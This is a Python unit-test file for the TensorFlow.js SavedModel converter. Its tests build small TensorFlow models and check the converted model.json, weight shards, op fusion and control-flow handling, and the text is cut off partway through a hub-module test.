tfjs-converter/python/tensorflowjs/converters/tf_saved_model_conversion_v2_test.py
|
xhcao/tfjs
|
1a2e5dc1dcb475e6f503e55543c790a5d4df075f
|
[
"Apache-2.0"
] | null | null | null |
tfjs-converter/python/tensorflowjs/converters/tf_saved_model_conversion_v2_test.py
|
xhcao/tfjs
|
1a2e5dc1dcb475e6f503e55543c790a5d4df075f
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for artifact conversion to and from Tensorflow SavedModel v2."""
import base64
import glob
import json
import os
import shutil
import tempfile
import unittest
import tensorflow.compat.v2 as tf
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import variables
from tensorflow.python.training.tracking import tracking
from tensorflow.python.tools import freeze_graph
from tensorflow.python.saved_model.save import save
import tensorflow_hub as hub
from tensorflowjs import version
from tensorflowjs.converters import graph_rewrite_util
from tensorflowjs.converters import tf_saved_model_conversion_v2
SAVED_MODEL_DIR = 'saved_model'
HUB_MODULE_DIR = 'hub_module'
FROZEN_MODEL_DIR = 'frozen_model'
class ConvertTest(tf.test.TestCase):
def setUp(self):
super(ConvertTest, self).setUp()
self._tmp_dir = tempfile.mkdtemp()
def tearDown(self):
if os.path.isdir(self._tmp_dir):
shutil.rmtree(self._tmp_dir)
super(ConvertTest, self).tearDown()
def _create_saved_model_v1(self):
"""Create a TensorFlow SavedModel for testing."""
graph = tf.Graph()
with graph.as_default():
x = tf.compat.v1.constant([[37.0, -23.0], [1.0, 4.0]])
w = tf.compat.v1.get_variable('w', shape=[2, 2])
y = tf.compat.v1.matmul(x, w)
output = tf.compat.v1.nn.softmax(y)
init_op = w.initializer
# Create a builder.
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
builder = tf.compat.v1.saved_model.builder.SavedModelBuilder(save_dir)
with tf.compat.v1.Session() as sess:
# Run the initializer on `w`.
sess.run(init_op)
builder.add_meta_graph_and_variables(
sess, [tf.compat.v1.saved_model.tag_constants.SERVING],
signature_def_map={
'serving_default':
tf.compat.v1.saved_model \
.signature_def_utils.predict_signature_def(
inputs={'x': x},
outputs={'output': output})
},
assets_collection=None)
builder.save()
def _create_saved_model_v1_with_hashtable(self):
"""Create a TensorFlow SavedModel V1 with unused hash table for testing."""
graph = tf.Graph()
with graph.as_default():
x = tf.compat.v1.placeholder('int32', [None, 2, 2])
t = tf.compat.v1.to_float(x)
w = tf.compat.v1.get_variable('w', shape=[2, 2])
output = tf.compat.v1.matmul(t, w)
init_op = w.initializer
# Add a hash table that is not used by the output.
keys = tf.constant(['key'])
values = tf.constant([1])
initializer = tf.lookup.KeyValueTensorInitializer(keys, values)
table = tf.lookup.StaticHashTable(initializer, -1)
# Create a builder.
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
builder = tf.compat.v1.saved_model.builder.SavedModelBuilder(
save_dir)
with tf.compat.v1.Session() as sess:
# Run the initializer on `w`.
sess.run(init_op)
table.lookup(keys)
builder.add_meta_graph_and_variables(
sess, [tf.compat.v1.saved_model.tag_constants.SERVING],
signature_def_map={
'serving_default':
tf.compat.v1.saved_model \
.signature_def_utils.predict_signature_def(
inputs={'t': t},
outputs={'output': output})
},
assets_collection=None)
builder.save()
def _create_saved_model_with_fusable_conv2d(self, use_bias):
"""Test a basic model with fusable conv2d."""
layers = [
tf.keras.layers.Conv2D(
16, [3, 3], padding='same', use_bias=use_bias),
tf.keras.layers.BatchNormalization(),
tf.keras.layers.ReLU()
]
model = tf.keras.Sequential(layers)
model.predict(tf.ones((1, 224, 224, 3)))
tf.keras.backend.set_learning_phase(0)
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
tf.saved_model.save(model, save_dir)
def _create_saved_model_with_fusable_depthwise_conv2d(self):
"""Test a basic model with fusable depthwise conv2d."""
layers = [
tf.keras.layers.DepthwiseConv2D(
1, use_bias=True,
bias_initializer=tf.initializers.constant(0.25)),
tf.keras.layers.ReLU()
]
model = tf.keras.Sequential(layers)
model.predict(tf.ones((1, 2, 2, 3)))
tf.keras.backend.set_learning_phase(0)
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
tf.saved_model.save(model, save_dir)
def _create_saved_model_with_prelu(self):
"""Test a basic model with fusable conv2d."""
layers = [
tf.keras.layers.Conv2D(
16, [3, 3], padding='same', use_bias=True,
bias_initializer=tf.initializers.constant(0.25)),
tf.keras.layers.PReLU(alpha_initializer=tf.initializers.constant(0.25)),
tf.keras.layers.DepthwiseConv2D(
1, use_bias=True,
bias_initializer=tf.initializers.constant(0.25)),
tf.keras.layers.PReLU(alpha_initializer=tf.initializers.constant(0.25))
]
model = tf.keras.Sequential(layers)
model.predict(tf.ones((1, 224, 224, 3)))
tf.keras.backend.set_learning_phase(0)
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
tf.saved_model.save(model, save_dir)
def _create_saved_model_with_unfusable_prelu(self):
"""Test a basic model with unfusable prelu."""
layers = [
tf.keras.layers.ReLU(),
tf.keras.layers.PReLU(alpha_initializer=tf.initializers.constant(0.25))
]
model = tf.keras.Sequential(layers)
model.predict(tf.ones((1, 224, 3)))
tf.keras.backend.set_learning_phase(0)
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
tf.saved_model.save(model, save_dir)
def _create_saved_model(self):
"""Test a basic model with functions to make sure functions are inlined."""
input_data = constant_op.constant(1., shape=[1])
root = tracking.AutoTrackable()
root.v1 = variables.Variable(3.)
root.v2 = variables.Variable(2.)
root.f = def_function.function(lambda x: root.v1 * root.v2 * x)
to_save = root.f.get_concrete_function(input_data)
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
save(root, save_dir, to_save)
def _create_saved_model_with_fusable_matmul(self):
"""Test a fusable matmul model."""
input_data = constant_op.constant(1., shape=[1, 1])
bias_data = constant_op.constant(1., shape=[1])
root = tracking.AutoTrackable()
root.v2 = variables.Variable([[2.]])
root.f = def_function.function(
lambda x: tf.nn.relu(tf.nn.bias_add(tf.matmul(x, root.v2),
bias_data)))
to_save = root.f.get_concrete_function(input_data)
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
save(root, save_dir, to_save)
def _create_saved_model_with_control_flow(self):
"""Test a basic model with control flow to inlined."""
@tf.function
def find_next_odd(v):
v1 = v + 1
while tf.equal(v1 % 2, 0):
v1 = v1 + 1
return v1
root = tracking.AutoTrackable()
root.f = find_next_odd
to_save = root.f.get_concrete_function(
tensor_spec.TensorSpec([], dtypes.int32))
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
save(root, save_dir, to_save)
def _create_unsupported_saved_model(self):
root = tracking.AutoTrackable()
root.w = variables.Variable(tf.random.uniform([2, 2]))
@def_function.function
def exported_function(x):
root.x = constant_op.constant([[37.0, -23.0], [1.0, 4.0]])
root.y = tf.matmul(root.x, root.w)
# unsupported op: linalg.diag
root.z = tf.linalg.diag(root.y)
return root.z * x
root.f = exported_function
to_save = root.f.get_concrete_function(
tensor_spec.TensorSpec([], dtypes.float32))
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
save(root, save_dir, to_save)
def _create_saved_model_with_debug_ops(self):
root = tracking.AutoTrackable()
root.w = variables.Variable(tf.random.uniform([2, 2]))
@def_function.function
def exported_function(x):
root.x = constant_op.constant([[37.0, -23.0], [1.0, 4.0]])
root.y = tf.matmul(root.x, root.w)
tf.compat.v1.Print(root.x, [root.x])
tf.compat.v1.Assert(tf.greater(tf.reduce_max(root.x), 0), [root.x])
tf.compat.v1.check_numerics(root.x, 'NaN found')
return root.y * x
root.f = exported_function
to_save = root.f.get_concrete_function(
tensor_spec.TensorSpec([], dtypes.float32))
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
save(root, save_dir, to_save)
def _create_hub_module(self):
# Module function that doubles its input.
def double_module_fn():
w = tf.Variable([2.0, 4.0])
x = tf.compat.v1.placeholder(dtype=tf.float32)
hub.add_signature(inputs=x, outputs=x*w)
graph = tf.Graph()
with graph.as_default():
spec = hub.create_module_spec(double_module_fn)
m = hub.Module(spec)
# Export the module.
with tf.compat.v1.Session(graph=graph) as sess:
sess.run(tf.compat.v1.global_variables_initializer())
m.export(os.path.join(self._tmp_dir, HUB_MODULE_DIR), sess)
def create_frozen_model(self):
graph = tf.Graph()
saved_model_dir = os.path.join(self._tmp_dir, FROZEN_MODEL_DIR)
with graph.as_default():
x = tf.constant([[37.0, -23.0], [1.0, 4.0]])
w = tf.Variable(tf.random.uniform([2, 2]))
y = tf.matmul(x, w)
tf.nn.softmax(y)
init_op = w.initializer
# Create a builder
builder = tf.compat.v1.saved_model.builder.SavedModelBuilder(
saved_model_dir)
with tf.compat.v1.Session() as sess:
# Run the initializer on `w`.
sess.run(init_op)
builder.add_meta_graph_and_variables(
sess, [tf.compat.v1.saved_model.tag_constants.SERVING],
signature_def_map=None,
assets_collection=None)
builder.save()
frozen_file = os.path.join(self._tmp_dir, FROZEN_MODEL_DIR, 'model.frozen')
freeze_graph.freeze_graph(
'',
'',
True,
'',
"Softmax",
'',
'',
frozen_file,
True,
'',
saved_model_tags=tf.compat.v1.saved_model.tag_constants.SERVING,
input_saved_model_dir=saved_model_dir)
def test_convert_saved_model_v1(self):
self._create_saved_model_v1()
input_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
output_dir = os.path.join(input_dir, 'js')
tf_saved_model_conversion_v2.convert_tf_saved_model(
input_dir,
output_dir
)
tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'js')
# Check model.json and weights manifest.
with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
model_json = json.load(f)
self.assertTrue(model_json['modelTopology'])
self.assertIsNot(model_json['modelTopology']['versions'], None)
signature = model_json['userDefinedMetadata']['signature']
self.assertIsNot(signature, None)
self.assertIsNot(signature['inputs'], None)
self.assertIsNot(signature['outputs'], None)
weights_manifest = model_json['weightsManifest']
self.assertCountEqual(weights_manifest[0]['paths'],
['group1-shard1of1.bin'])
self.assertIn('weights', weights_manifest[0])
# Check meta-data in the artifact JSON.
self.assertEqual(model_json['format'], 'graph-model')
self.assertEqual(
model_json['convertedBy'],
'TensorFlow.js Converter v%s' % version.version)
self.assertEqual(model_json['generatedBy'],
tf.__version__)
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def test_convert_saved_model_v1_with_hashtable(self):
self._create_saved_model_v1_with_hashtable()
input_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
output_dir = os.path.join(input_dir, 'js')
tf_saved_model_conversion_v2.convert_tf_saved_model(
input_dir,
output_dir
)
expected_weights_manifest = [{
'paths': ['group1-shard1of1.bin'],
'weights': [
{'dtype': 'float32', 'name': 'w', 'shape': [2, 2]},
{'dtype': 'string', 'name': 'Const', 'shape': [1]},
{'dtype': 'int32', 'name': 'Const_1', 'shape': [1]}
]}]
tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'js')
# Check model.json and weights manifest.
with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
model_json = json.load(f)
self.assertTrue(model_json['modelTopology'])
self.assertIsNot(model_json['modelTopology']['versions'], None)
signature = model_json['userDefinedMetadata']['signature']
self.assertIsNot(signature, None)
self.assertIsNot(signature['inputs'], None)
self.assertIsNot(signature['outputs'], None)
self.assertTrue(model_json['modelInitializer'])
for node in model_json['modelTopology']['node']:
if node['name'] == 'ToFloat' and node['op'] == 'Placeholder':
self.assertEqual(node['attr']['shape'],
{'shape': {'dim': [
{'size': '-1'}, {'size': '2'}, {'size': '2'}]}})
weights_manifest = model_json['weightsManifest']
self.assertEqual(weights_manifest, expected_weights_manifest)
# Check meta-data in the artifact JSON.
self.assertEqual(model_json['format'], 'graph-model')
self.assertEqual(
model_json['convertedBy'],
'TensorFlow.js Converter v%s' % version.version)
self.assertEqual(model_json['generatedBy'],
tf.__version__)
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def test_convert_saved_model(self):
self._create_saved_model()
tf_saved_model_conversion_v2.convert_tf_saved_model(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
)
tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
# Check model.json and weights manifest.
with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
model_json = json.load(f)
self.assertTrue(model_json['modelTopology'])
self.assertIsNot(model_json['modelTopology']['versions'], None)
signature = model_json['userDefinedMetadata']['signature']
self.assertIsNot(signature, None)
self.assertIsNot(signature['inputs'], None)
self.assertIsNot(signature['outputs'], None)
weights_manifest = model_json['weightsManifest']
self.assertCountEqual(weights_manifest[0]['paths'],
['group1-shard1of1.bin'])
self.assertIn('weights', weights_manifest[0])
def test_convert_saved_model_with_fused_conv2d(self):
for use_bias in [True, False]:
self._create_saved_model_with_fusable_conv2d(use_bias)
tf_saved_model_conversion_v2.convert_tf_saved_model(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
)
tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
# Check model.json and weights manifest.
with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
model_json = json.load(f)
self.assertTrue(model_json['modelTopology'])
self.assertIsNot(model_json['modelTopology']['versions'], None)
signature = model_json['userDefinedMetadata']['signature']
self.assertIsNot(signature, None)
self.assertIsNot(signature['inputs'], None)
self.assertIsNot(signature['outputs'], None)
nodes = model_json['modelTopology']['node']
fused_op = None
for node in nodes:
self.assertNotIn('BatchNorm', node['op'])
self.assertNotIn('Relu', node['op'])
self.assertNotIn('BiasAdd', node['op'])
if node['op'] == '_FusedConv2D':
fused_op = node
self.assertIsNot(fused_op, None)
self.assertEqual(
base64.b64decode(fused_op['attr']['fused_ops']['list']['s'][0]),
b'BiasAdd')
self.assertEqual(
base64.b64decode(fused_op['attr']['fused_ops']['list']['s'][1]),
b'Relu')
# Check meta-data in the artifact JSON.
self.assertEqual(model_json['format'], 'graph-model')
self.assertEqual(
model_json['convertedBy'],
'TensorFlow.js Converter v%s' % version.version)
self.assertEqual(model_json['generatedBy'],
tf.__version__)
self.assertTrue(
glob.glob(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'group*-*')))
def test_convert_saved_model_with_fused_matmul(self):
self._create_saved_model_with_fusable_matmul()
tf_saved_model_conversion_v2.convert_tf_saved_model(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
)
tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
# Check model.json and weights manifest.
with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
model_json = json.load(f)
self.assertTrue(model_json['modelTopology'])
self.assertIsNot(model_json['modelTopology']['versions'], None)
signature = model_json['userDefinedMetadata']['signature']
self.assertIsNot(signature, None)
self.assertIsNot(signature['inputs'], None)
self.assertIsNot(signature['outputs'], None)
nodes = model_json['modelTopology']['node']
fused_op = None
for node in nodes:
self.assertNotEqual(node['op'], 'MatMul')
self.assertNotIn('Relu', node['op'])
self.assertNotIn('BiasAdd', node['op'])
if node['op'] == graph_rewrite_util.FUSED_MATMUL:
fused_op = node
self.assertIsNot(fused_op, None)
self.assertIsNot(fused_op['attr']['transpose_a'], None)
self.assertIsNot(fused_op['attr']['transpose_b'], None)
self.assertEqual(
base64.b64decode(fused_op['attr']['fused_ops']['list']['s'][0]),
b'BiasAdd')
self.assertEqual(
base64.b64decode(fused_op['attr']['fused_ops']['list']['s'][1]),
b'Relu')
# Check meta-data in the artifact JSON.
self.assertEqual(model_json['format'], 'graph-model')
self.assertEqual(
model_json['convertedBy'],
'TensorFlow.js Converter v%s' % version.version)
self.assertEqual(model_json['generatedBy'],
tf.__version__)
self.assertTrue(
glob.glob(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'group*-*')))
def test_convert_saved_model_with_fused_depthwise_conv2d(self):
self._create_saved_model_with_fusable_depthwise_conv2d()
tf_saved_model_conversion_v2.convert_tf_saved_model(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
)
tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
# Check model.json and weights manifest.
with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
model_json = json.load(f)
self.assertTrue(model_json['modelTopology'])
self.assertIsNot(model_json['modelTopology']['versions'], None)
signature = model_json['userDefinedMetadata']['signature']
self.assertIsNot(signature, None)
self.assertIsNot(signature['inputs'], None)
self.assertIsNot(signature['outputs'], None)
nodes = model_json['modelTopology']['node']
fused_op = None
for node in nodes:
self.assertNotIn('BatchNorm', node['op'])
self.assertNotIn('Relu', node['op'])
self.assertNotIn('BiasAdd', node['op'])
if node['op'] == graph_rewrite_util.FUSED_DEPTHWISE_CONV2D:
fused_op = node
self.assertIsNot(fused_op, None)
self.assertIsNot(fused_op['attr']['dilations'], None)
self.assertIsNot(fused_op['attr']['strides'], None)
self.assertEqual(
base64.b64decode(fused_op['attr']['fused_ops']['list']['s'][0]),
b'BiasAdd')
self.assertEqual(
base64.b64decode(fused_op['attr']['fused_ops']['list']['s'][1]),
b'Relu')
# Check meta-data in the artifact JSON.
self.assertEqual(model_json['format'], 'graph-model')
self.assertEqual(
model_json['convertedBy'],
'TensorFlow.js Converter v%s' % version.version)
self.assertEqual(model_json['generatedBy'],
tf.__version__)
self.assertTrue(
glob.glob(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'group*-*')))
def test_convert_saved_model_with_prelu(self):
self._create_saved_model_with_prelu()
tf_saved_model_conversion_v2.convert_tf_saved_model(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
)
tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
# Check model.json and weights manifest.
with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
model_json = json.load(f)
self.assertTrue(model_json['modelTopology'])
self.assertIsNot(model_json['modelTopology']['versions'], None)
signature = model_json['userDefinedMetadata']['signature']
self.assertIsNot(signature, None)
self.assertIsNot(signature['inputs'], None)
self.assertIsNot(signature['outputs'], None)
nodes = model_json['modelTopology']['node']
prelu_op = None
fused_op = None
depthwise_fused_op = None
for node in nodes:
if node['op'] == 'Prelu':
prelu_op = node
if node['op'] == '_FusedConv2D':
fused_op = node
if node['op'] == graph_rewrite_util.FUSED_DEPTHWISE_CONV2D:
depthwise_fused_op = node
self.assertTrue(prelu_op is None)
self.assertIsNot(fused_op, None)
self.assertIsNot(depthwise_fused_op, None)
fused_ops = list(map(base64.b64decode,
fused_op['attr']['fused_ops']['list']['s']))
self.assertEqual(fused_ops, [b'BiasAdd', b'Prelu'])
self.assertEqual(fused_op['attr']['num_args']['i'], '2')
depthwise_fused_ops = list(
map(base64.b64decode,
depthwise_fused_op['attr']['fused_ops']['list']['s']))
self.assertEqual(depthwise_fused_ops, [b'BiasAdd', b'Prelu'])
self.assertEqual(depthwise_fused_op['attr']['num_args']['i'], '2')
# Check meta-data in the artifact JSON.
self.assertEqual(model_json['format'], 'graph-model')
self.assertEqual(
model_json['convertedBy'],
'TensorFlow.js Converter v%s' % version.version)
self.assertEqual(model_json['generatedBy'],
tf.__version__)
self.assertTrue(
glob.glob(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'group*-*')))
def test_convert_saved_model_with_unfusable_prelu(self):
self._create_saved_model_with_unfusable_prelu()
tf_saved_model_conversion_v2.convert_tf_saved_model(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
)
tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
# Check model.json and weights manifest.
with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
model_json = json.load(f)
self.assertTrue(model_json['modelTopology'])
self.assertIsNot(model_json['modelTopology']['versions'], None)
signature = model_json['userDefinedMetadata']['signature']
self.assertIsNot(signature, None)
self.assertIsNot(signature['inputs'], None)
self.assertIsNot(signature['outputs'], None)
nodes = model_json['modelTopology']['node']
prelu_op = None
for node in nodes:
if node['op'] == 'Prelu':
prelu_op = node
break
self.assertTrue(prelu_op)
# Check meta-data in the artifact JSON.
self.assertEqual(model_json['format'], 'graph-model')
self.assertEqual(
model_json['convertedBy'],
'TensorFlow.js Converter v%s' % version.version)
self.assertEqual(model_json['generatedBy'],
tf.__version__)
self.assertTrue(
glob.glob(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'group*-*')))
def test_convert_saved_model_with_control_flow(self):
self._create_saved_model_with_control_flow()
tf_saved_model_conversion_v2.convert_tf_saved_model(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
)
tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
# Check model.json and weights manifest.
with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
model_json = json.load(f)
self.assertTrue(model_json['modelTopology'])
self.assertIsNot(model_json['modelTopology']['versions'], None)
signature = model_json['userDefinedMetadata']['signature']
self.assertIsNot(signature, None)
self.assertIsNot(signature['inputs'], None)
self.assertIsNot(signature['outputs'], None)
weights_manifest = model_json['weightsManifest']
self.assertCountEqual(weights_manifest[0]['paths'],
['group1-shard1of1.bin'])
self.assertIn('weights', weights_manifest[0])
# Check meta-data in the artifact JSON.
self.assertEqual(model_json['format'], 'graph-model')
self.assertEqual(
model_json['convertedBy'],
'TensorFlow.js Converter v%s' % version.version)
self.assertEqual(model_json['generatedBy'],
tf.__version__)
self.assertTrue(
glob.glob(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'group*-*')))
def test_convert_saved_model_with_control_flow_v2(self):
self._create_saved_model_with_control_flow()
tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
tf_saved_model_conversion_v2.convert_tf_saved_model(
tfjs_path, tfjs_path, control_flow_v2=True
)
# Check model.json and weights manifest.
with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
model_json = json.load(f)
self.assertTrue(model_json['modelTopology'])
self.assertIsNot(model_json['modelTopology']['versions'], None)
signature = model_json['userDefinedMetadata']['signature']
self.assertIsNot(signature, None)
self.assertIsNot(signature['inputs'], None)
self.assertIsNot(signature['outputs'], None)
weights_manifest = model_json['weightsManifest']
self.assertCountEqual(weights_manifest[0]['paths'],
['group1-shard1of1.bin'])
self.assertIn('weights', weights_manifest[0])
add_y_weight = None
for weight in weights_manifest[0]['weights']:
if 'add/y' in weight['name']:
add_y_weight = weight
self.assertIsNot(add_y_weight, None)
self.assertFalse(add_y_weight['name'].startswith('add/y'))
nodes = model_json['modelTopology']['node']
while_op = None
for node in nodes:
self.assertNotIn('Merge', node['op'])
self.assertNotIn('Switch', node['op'])
if node['op'] == 'StatelessWhile':
while_op = node
self.assertIsNot(while_op, None)
# Check meta-data in the artifact JSON.
self.assertEqual(model_json['format'], 'graph-model')
self.assertEqual(
model_json['convertedBy'],
'TensorFlow.js Converter v%s' % version.version)
self.assertEqual(model_json['generatedBy'],
tf.__version__)
self.assertTrue(
glob.glob(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'group*-*')))
def test_convert_saved_model_sharded(self):
self._create_saved_model()
model_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
# Do initial conversion without sharding.
tf_saved_model_conversion_v2.convert_tf_saved_model(model_path, tfjs_path)
weight_files = glob.glob(os.path.join(tfjs_path, 'group*.bin'))
# Get size of weights in bytes after graph optimizations.
optimized_total_weight = sum([os.path.getsize(f) for f in weight_files])
# Due to the shard size, there ought to be 2 shards after conversion.
weight_shard_size_bytes = int(optimized_total_weight * 0.8)
tfjs_path = os.path.join(self._tmp_dir, 'sharded_model')
# Convert Saved Model again with shard argument set.
tf_saved_model_conversion_v2.convert_tf_saved_model(
model_path, tfjs_path,
weight_shard_size_bytes=weight_shard_size_bytes)
weight_files = sorted(glob.glob(os.path.join(tfjs_path, 'group*.bin')))
self.assertEqual(len(weight_files), 2)
weight_file_sizes = [os.path.getsize(f) for f in weight_files]
self.assertEqual(sum(weight_file_sizes), optimized_total_weight)
self.assertLess(weight_file_sizes[1], weight_file_sizes[0])
def test_optimizer_add_unsupported_op(self):
self._create_unsupported_saved_model()
with self.assertRaisesRegexp( # pylint: disable=deprecated-method
ValueError, r'^Unsupported Ops'):
tf_saved_model_conversion_v2.convert_tf_saved_model(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
)
def test_convert_saved_model_skip_op_check(self):
self._create_unsupported_saved_model()
tf_saved_model_conversion_v2.convert_tf_saved_model(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
os.path.join(self._tmp_dir, SAVED_MODEL_DIR), skip_op_check=True
)
tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
# Check model.json and weights manifest.
with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
model_json = json.load(f)
self.assertTrue(model_json['modelTopology'])
self.assertIsNot(model_json['modelTopology']['versions'], None)
signature = model_json['userDefinedMetadata']['signature']
self.assertIsNot(signature, None)
self.assertIsNot(signature['inputs'], None)
self.assertIsNot(signature['outputs'], None)
weights_manifest = model_json['weightsManifest']
self.assertCountEqual(weights_manifest[0]['paths'],
['group1-shard1of1.bin'])
self.assertIn('weights', weights_manifest[0])
self.assertTrue(
glob.glob(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'group*-*')))
# (TODO: piyu) disable this test, need to change
# convert_variables_to_constants_v2 to set function_optimization=aggressive.
@unittest.skip('not supported')
def test_convert_saved_model_strip_debug_ops(self):
self._create_saved_model_with_debug_ops()
tf_saved_model_conversion_v2.convert_tf_saved_model(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
strip_debug_ops=True)
tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
# Check model.json and weights manifest.
with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
model_json = json.load(f)
self.assertTrue(model_json['modelTopology'])
self.assertIsNot(model_json['modelTopology']['versions'], None)
signature = model_json['userDefinedMetadata']['signature']
self.assertIsNot(signature, None)
self.assertIsNot(signature['inputs'], None)
self.assertIsNot(signature['outputs'], None)
weights_manifest = model_json['weightsManifest']
self.assertCountEqual(weights_manifest[0]['paths'],
['group1-shard1of1.bin'])
self.assertIn('weights', weights_manifest[0])
self.assertTrue(
glob.glob(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'group*-*')))
def test_convert_hub_module_v1(self):
self._create_hub_module()
module_path = os.path.join(self._tmp_dir, HUB_MODULE_DIR)
tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
tf_saved_model_conversion_v2.convert_tf_hub_module(module_path, tfjs_path)
# Check model.json and weights manifest.
with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
model_json = json.load(f)
self.assertTrue(model_json['modelTopology'])
self.assertIsNot(model_json['modelTopology']['versions'], None)
signature = model_json['userDefinedMetadata']['signature']
self.assertIsNot(signature, None)
self.assertIsNot(signature['inputs'], None)
self.assertIsNot(signature['outputs'], None)
weights_manifest = model_json['weightsManifest']
self.assertCountEqual(weights_manifest[0]['paths'],
['group1-shard1of1.bin'])
self.assertIn('weights', weights_manifest[0])
self.assertTrue(
glob.glob(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'group*-*')))
def test_convert_hub_module_v1_sharded(self):
self._create_hub_module()
module_path = os.path.join(self._tmp_dir, HUB_MODULE_DIR)
tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
# Do initial conversion without sharding.
tf_saved_model_conversion_v2.convert_tf_hub_module(module_path, tfjs_path)
weight_files = glob.glob(os.path.join(tfjs_path, 'group*.bin'))
# Get size of weights in bytes after graph optimizations.
optimized_total_weight = sum([os.path.getsize(f) for f in weight_files])
# Due to the shard size, there ought to be 3 shards after conversion.
weight_shard_size_bytes = int(optimized_total_weight * 0.4)
tfjs_path = os.path.join(self._tmp_dir, 'sharded_model')
# Convert Hub model again with shard argument set.
tf_saved_model_conversion_v2.convert_tf_hub_module(
module_path, tfjs_path,
weight_shard_size_bytes=weight_shard_size_bytes)
weight_files = sorted(glob.glob(os.path.join(tfjs_path, 'group*.bin')))
self.assertEqual(len(weight_files), 3)
weight_file_sizes = [os.path.getsize(f) for f in weight_files]
self.assertEqual(sum(weight_file_sizes), optimized_total_weight)
self.assertEqual(weight_file_sizes[0], weight_file_sizes[1])
self.assertLess(weight_file_sizes[2], weight_file_sizes[0])
def test_convert_hub_module_v2(self):
self._create_saved_model()
module_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
tf_saved_model_conversion_v2.convert_tf_hub_module(
module_path, tfjs_path, "serving_default", "serve")
# Check model.json and weights manifest.
